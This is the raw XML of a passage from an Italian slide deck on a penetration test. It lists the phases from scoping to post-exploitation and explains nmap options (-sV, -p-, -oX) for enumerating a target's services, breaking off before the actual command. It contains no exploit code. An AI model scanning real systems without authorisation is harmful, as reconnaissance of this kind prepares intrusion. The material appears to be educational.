          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6150752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Google Shape;2685;p43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6219FA9C-AAF6-4C2A-6056-7244FA6A71BF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8993743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Individuazione della macchina </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="82" name="Google Shape;2686;p43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B501273F-AFF0-F8BF-F9A6-E80D23535575}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8904252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Discovery</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="83" name="Google Shape;2686;p43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A8EF3834-B6F7-56F4-C86A-B487A5C68A08}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8905555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Google Shape;2685;p43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5322EF44-D519-CCB9-7D23-AB6F07BB05E8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="719957" y="5284522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dei servizi esposti dalla macchina</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="101" name="Google Shape;2686;p43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F4535016-F30C-8954-26C5-82F629890E3C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="630466" y="490996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Enumerating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Target</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="102" name="Google Shape;2686;p43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A49380DD-6FA6-B454-5070-7426BFA0D50C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="631769" y="402451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3" name="Google Shape;2685;p43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8FBB894C-1FF8-7D81-16BB-969484823587}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3477367" y="52846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Analisi dei problemi di sicurezza della macchina</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="104" name="Google Shape;2686;p43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AEB2C201-EB3D-AD5D-B471-9A67BFBAA78D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3387876" y="49100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Vulnerability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Mapping</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="105" name="Google Shape;2686;p43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4071A593-F62C-6F5D-6229-96CBDE5FC1C4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3389179" y="40246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6" name="Google Shape;2685;p43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{974F0F60-73FF-9152-0B82-3AE630A4C40F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6239989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Sfruttamento delle vulnerabilità identificate</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="107" name="Google Shape;2686;p43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{55A3F5AA-7955-2BD0-810C-4F774F96E6FC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6150498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Exploitation</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="108" name="Google Shape;2686;p43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E6D69C5A-300A-813F-52B4-58346641FCDE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6151801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Google Shape;2685;p43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{71B8FCE1-50DE-B51C-50D9-AEAF9E6F3827}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8994792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Privilege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Escalation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Mantaining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Access</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="110" name="Google Shape;2686;p43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E3BAFCFD-E52D-C16E-E72C-CC4CAA299C7D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8905301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Post Exploitation</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="111" name="Google Shape;2686;p43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FDC0D109-E6E8-8745-A06D-F862BDE306F1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8906604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72862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1A3260"/>
            </a:gs>
            <a:gs pos="100000">
              <a:srgbClr val="25468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tangolo 121">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8C0A454C-8EBE-BFD1-BDE1-5AFF67ED2052}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="889533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2D574A72-4333-EDA4-E272-AF58B0A83CFB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="614266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3064F1B-4547-A3B6-A9B2-E4A016EFB1D1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6148797" y="1360665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9DAA0B11-ADC5-7C57-6D63-115CF6E911D6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8895340" y="136095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2656F24F-3B3F-3B62-D95C-6128286003FC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3402253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74219E84-0E88-40C4-C060-721FB1639B36}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3402254" y="134817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DD2DD3BF-1E82-13F6-8CC2-2E630E328286}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="630467" y="3859506"/>
            <a:ext cx="2611973" cy="2300961"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="4472C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8EDEF159-E7E1-CED4-924E-33310161E37E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="629418" y="1348173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B9F3C-8AD4-65DA-DD79-DA0F801F92AD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="53449" y="298112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TABLE OF CONTENT</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="53" name="Google Shape;2685;p43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BC90CC3D-05EE-6228-5A5A-6E9C219BAEAF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="718908" y="2803267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Uno sguardo agli strumenti utilizzati nelle varie fasi</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="54" name="Google Shape;2686;p43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B793AF34-6614-AEA2-96F9-B50AE3CFF52E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="629417" y="242871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Strumenti Utilizzati</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="59" name="Google Shape;2686;p43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{911EC704-3F17-828E-E68E-CD745D28D0A8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="630720" y="154326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Google Shape;2685;p43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{11B312B6-A920-5A54-5724-D7CF16D56138}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3476318" y="28033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“Scope” di cosa è stato analizzato</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="66" name="Google Shape;2686;p43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BC4F4BB3-1CB0-3FD5-5EC6-F319DCE226E0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3386827" y="24288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Scoping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Google Shape;2686;p43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F7B1D64F-9D4F-A16C-C85C-964D00932EA4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3388130" y="15433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Google Shape;2685;p43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D2A1E0E7-1AA4-186E-5AEF-8AEF4132AA0F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6238940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Recupero delle informazioni</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="70" name="Google Shape;2686;p43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{58708409-AA91-4FC6-7665-6A5061A16B4B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6149449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Information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Gathering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Google Shape;2686;p43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A43A0249-E69B-B8D4-9A81-F8DEDFC6BCE4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6150752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Google Shape;2685;p43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6219FA9C-AAF6-4C2A-6056-7244FA6A71BF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8993743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della macchina </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="82" name="Google Shape;2686;p43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B501273F-AFF0-F8BF-F9A6-E80D23535575}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8904252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Discovery</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="83" name="Google Shape;2686;p43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A8EF3834-B6F7-56F4-C86A-B487A5C68A08}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8905555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Google Shape;2685;p43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5322EF44-D519-CCB9-7D23-AB6F07BB05E8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="719957" y="5284522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Individuazione dei servizi esposti dalla macchina</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="101" name="Google Shape;2686;p43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F4535016-F30C-8954-26C5-82F629890E3C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="630466" y="490996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Enumerating</a:t>
            </a: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Target</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="102" name="Google Shape;2686;p43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A49380DD-6FA6-B454-5070-7426BFA0D50C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="631769" y="402451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Google Shape;2685;p43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8FBB894C-1FF8-7D81-16BB-969484823587}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3477367" y="52846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Analisi dei problemi di sicurezza della macchina</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="104" name="Google Shape;2686;p43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AEB2C201-EB3D-AD5D-B471-9A67BFBAA78D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3387876" y="49100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Vulnerability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Mapping</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="105" name="Google Shape;2686;p43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4071A593-F62C-6F5D-6229-96CBDE5FC1C4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3389179" y="40246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6" name="Google Shape;2685;p43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{974F0F60-73FF-9152-0B82-3AE630A4C40F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6239989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Sfruttamento delle vulnerabilità identificate</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="107" name="Google Shape;2686;p43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{55A3F5AA-7955-2BD0-810C-4F774F96E6FC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6150498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Exploitation</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="108" name="Google Shape;2686;p43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E6D69C5A-300A-813F-52B4-58346641FCDE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6151801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Google Shape;2685;p43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{71B8FCE1-50DE-B51C-50D9-AEAF9E6F3827}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8994792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Privilege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Escalation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Mantaining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Access</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="110" name="Google Shape;2686;p43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E3BAFCFD-E52D-C16E-E72C-CC4CAA299C7D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8905301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Post Exploitation</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="111" name="Google Shape;2686;p43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FDC0D109-E6E8-8745-A06D-F862BDE306F1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8906604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B9F3C-8AD4-65DA-DD79-DA0F801F92AD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="53449" y="325204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Enumerating target</a:t>
            </a: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979B1A2-164D-B8EA-C1CB-0CA455AF57AA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1242789" y="1282339"/>
            <a:ext cx="9673389" cy="364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Questa fase ha come obiettivo quello di acquisire quante più informazioni possibili sui servizi di rete erogati dalle macchine target attive. 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600" dirty="0"/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A tale scopo è stato utilizzato il tool </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1"/>
              <a:t>nmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" dirty="0"/>
              <a:t>, specificando le seguenti opzioni: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 -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1"/>
              <a:t>sV</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" dirty="0"/>
              <a:t> individua le versioni dei servizi esposti; 	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600" b="1" dirty="0"/>
              <a:t>-p- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" dirty="0"/>
              <a:t>effettua la scansione di tutte le 65535 porte; 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600" b="1" dirty="0"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1"/>
              <a:t>oX</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" dirty="0"/>
              <a:t>esporta l’output in formato XML; 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600" dirty="0"/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Il comando eseguito è </a:t>
            </a:r>
            <a:r>
